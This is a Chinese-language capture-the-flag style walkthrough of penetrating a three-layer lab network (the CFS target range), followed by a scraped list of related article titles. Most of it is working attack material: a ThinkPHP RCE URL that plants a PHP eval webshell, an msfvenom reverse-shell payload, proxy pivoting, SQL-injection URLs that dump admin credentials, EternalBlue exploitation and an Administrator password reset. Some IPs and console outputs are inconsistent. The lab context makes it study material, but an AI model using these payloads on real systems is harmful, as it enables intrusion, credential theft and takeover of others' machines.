是样一个逻辑
nmap信息收集:

nmap -T4 -O 192.168.1.107


http://192.168.1.107/public/

看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞
payload:

http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


执行成功说明存在此漏洞
写入shell

http://192.168.1.107/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%E2%80%9C%3C?php%20@eval($_POST[%E2%80%98TeamsSix%E2%80%99]);?%3E%E2%80%9D%20%3E%20shell.php

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['123456'])?>' > shell.php


看看是否写入:

http://192.168.1.107/public/shell.php


上菜刀连接:

如果有拦截改成base64

[scode type="yellow"]如果连接失败可能是存在过滤,可用base64进行编码
然后语句改为:echo "PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk/Pg==" | base64 -d > test1.php 即可

看下靶机一系统信息

uanme -a


然后使用msfvenom生成对应的反向shellcode:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=8848 -f elf > msf_shell.elf

把这个木马用菜刀上传上去:

使用命令运行它:

ls


运行不了看报错是权限问题

./

修改权限:

chmod 777 msf_shell.elf

运行

./msf_shell.elf


现在我们用msf监听:

msfconsole

刚才我把生成木马的ip写错了应该是192.168.1.108
控制命令如下:

自己的kali ip和监听端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.08
LHOST => 192.168.1.108
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

接着利用拿下的这个服务器打入内网:
1.获取内网网段地址:

run get_local_subnets


192.168.1.0/24是我们可访问的,我们需要添加一条道192.168.22.0/24的路由:

run autoroute -s 192.168.22.0/24


查看路由:

run autoroute -p


查看地址解析记录arp -a确定第二层目标为192.168.22.128

arp -a


使用background返回msf

搜索socks代理模块

search socks


use auxiliary/server/socks4a
show options


[scode type=“blue”]SRVHOST:监听的ip地址,默认为0.0.0.0,一般不需要更改。
SRVPORT:监听的端口,默认为1080,可自行修改
[/scode]
配置proxychains代理链

cat /etc/proxychains.conf

修改文件内容如下:
其实现在新版本默认就这样

0x02 靶机2
获取shell
端口扫描
此处扫描不能使用nmap默认的扫描方式,不能使用-A-T4参数
命令

proxychains nmap -Pn -sT 192.168.22.128

-Pn跳过主机发现阶段,把每个都IP当成存活主机。
-sn只进行主机发现,不进行端口扫描。

在这里先不急配置下环境2
其过程和1类似不懂的看上篇博客


这里我登录不上换个方式ssh

proxychains ssh root@192.168.22.128


进去后我们修改


访问

http://192.168.22.128/robots.txt

 proxychains dirb http://192.168.22.128

扫下目录

访问:

http://192.168.22.128/index.php?r=admini

跳转到:

http://192.168.22.128/index.php?r=admini/public/login


弱口令进不去,看下源代码

发现了版本号有sql注入
手工注入
先确定数据库

http://192.168.22.128/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,%20database(),0x7e),1)--+


现在读表名

http://192.168.22.22/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+


ok
也可使用limit逐条读取:

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='bagecms' limit 0,1),0x7e),1)--+


按照道理来讲这个更可以但是可能过滤了某些东西
现在读取字段

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='bagecms' and table_name='bage_admin'),1,32),0x7e),1)--+


确定字段值:

http://192.168.22.128/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select concat(username,0x7e,password) from bagecms.bage_admin),1,31),0x7e),1)--+


MD5去解码 也就是撞库
https://www.cmd5.com/

123qwe

我在这没解开自己去拿个自己去撞
现在登陆吧

http://192.168.22.128/index.php?r=admini/default/index



试试

phpinfo()


http://192.168.22.128/index.php?r=tag


可以看到被执行了
好了我们写入一句话木马吧

<?php @eval($_POST['123456'])?>


现在用个代理工具





到了这里因为是三层代理所以网络很不稳定
按照道理来讲
arp -a是可以看到三层目标的就和二层的方法一样亲测多次偶尔一两次成功所以很难成功
端口扫描

proxychains nmap -Pn -sT 192.168.33.33


目标开放了3389、445确认目标为windows,445可尝试看下是否存在EternalBlue(永恒之蓝)漏洞。
进入msf搜索ms17-010相关模块:

先使用辅助探测模块auxiliary/scanner/smb/smb_ms17_010查看下该机器是否存在该漏洞

msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.33.33
RHOSTS => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

结果表明该靶机很可能存在该漏洞。

下面开始利用:
利用模块存在两个:

exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec

[scode type=“green”]ms17_010_psexec是相对新一点的模块
一般首先使用ms17_010_psexec进行利用,若利用失败出现LoginError那么表示该机器可能需要指定SMBUser和SMBPass这时可尝试使用原始模块:ms17_010_eternalblue,但是某些版本还是可能会出现现要求指定SMBUser及SMBPass
[/scode]

msf5 exploit(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > exploit


利用成功:

meterpreter > shell
C:\Windows\system32>whoami
C:\Windows\system32>net user
C:\Windows\system32>net user Administrator 123456


SocksCap附加进程:mstsc.exe启动远程桌面进行远程登录:

0x04 FLAG位置
靶机1
1、 根目录下

https://assets-1252108786.cos.ap-chengdu.myqcloud.com/usr/uploads/2020/01/1579334733.png
3、robots.txt文件中

靶机2
1、Web管理后台

2、网站目录下


4、passwd文件中

5、crontab文件中

6、错误日志文件中

靶机3
1、桌面

2、C:\Windows\System32\config\目录下

3、任务计划里

4、注册编辑器里

渗透测试——CFS三层靶机渗透相关推荐

  1. 内网渗透之CFS三层靶机搭建

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

  2. 渗透测试之CFS三层靶机内网渗透

    一.环境搭建: 靶机拓扑: 1.添加虚拟网卡: 添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡: target1网络配置: tar ...

  3. 内网渗透之CFS三层靶场渗透

    环境搭建 网卡设置 kali为攻击机:192.168.3.57(桥接模式) Target1:192.168.3.120(桥接模式),192.168.22.128(仅主机模式Vmnet2) Target ...

  4. 【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞

    一.信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫 ...

  5. 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

  6. 【VulnHub靶场】——CFS三层靶机内网渗透实操

    作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...

  7. 渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具

    操作系统:https://zhuanlan.zhihu.com/p/162865015 1.基于 Windows.Linux.Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali ...

  8. 渗透测试学习之靶机DC-2

    1.下载靶机 本篇文章是DC靶机系列的第二个篇,针对DC-2,建议感兴趣的读者从DC-1开始练习((26条消息) 渗透测试学习之靶机DC-1_xdbzdgx的博客-CSDN博客). DC-2的下载地址 ...

  9. 渗透测试入门27之渗透测试学习建议

    最近发现很多小伙伴都在问我想要学习渗透测试,但是不知道怎么开始,也不知道要学习什么?所以在这里我打算分享一下我的渗透学习之路以及给初学者的一些建议. 我的学习之路 转眼间,我从学习渗透测试到工作也快六 ...

  10. 渗透测试入门13之渗透测试流程

    前言      本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 渗透测试的流程 (1)渗透测试目标以及界线的明确 在进行渗透测试之前,需要与客户就 ...

最新文章

  1. Linux的mount命令简介
  2. 考前自学系列·计算机组成原理·查询方式/中断方式/DMA方式的适用范围及判断
  3. 解析底层原理!月薪20k+的Android面试都问些什么?深夜思考
  4. Oracle之批量生成数据
  5. 东欧视频游戏市场概况
  6. yum安装nginx,并配置静态资源服务器
  7. 转换大师swf转html,iPixSoft SWF to HTML5 Converter
  8. MATLAB的人工神经网络应用
  9. 12天,这本《重学Java设计模式》PDF书籍下载量9k,新增粉丝1400人,Github上全球推荐榜!
  10. python方差分析样本量太大_十五、方差分析--使用Python进行单因素方差分析(ANOVA)...
  11. 39.JavaScript中Promise的基本概念、使用方法,回调地狱规避、链式编程
  12. Gradle同步工程下载依赖慢
  13. adams 绳索仿真
  14. 问答学习系统 - 针式PKM V8.20新增功能
  15. 互联网公司面试题以及范围
  16. python opencv 直方图均衡_深入理解OpenCV+Python直方图均衡化
  17. 关于Rost ContentMining 6.0情感分析出现空白的解决方案
  18. DynaTrace Ajax Edition:IE浏览器性能分析工具
  19. 如何寻找省级软件产业主管部门认可的软件检测机构出具报告
  20. canvas太极八卦图

热门文章

  1. android开机动画类型,安卓手机开机动画制作方法
  2. 排名前20的网页爬虫工具
  3. 简述写基础java小游戏一般思路。
  4. font-family常见中文字体对应的英文名称
  5. C++面向对象程序设计实践——任务与指导书(1)
  6. [软件更新]暴风影音2009最新特别版光盘免费赠送(暴风门特别版)
  7. 系统集成项目管理工程师计算题(成本管理计算)
  8. 指纹模式识别算法源码及其测试和应用方法
  9. unity2020 package 下载位置
  10. 比较器应用二:方波和三角波产生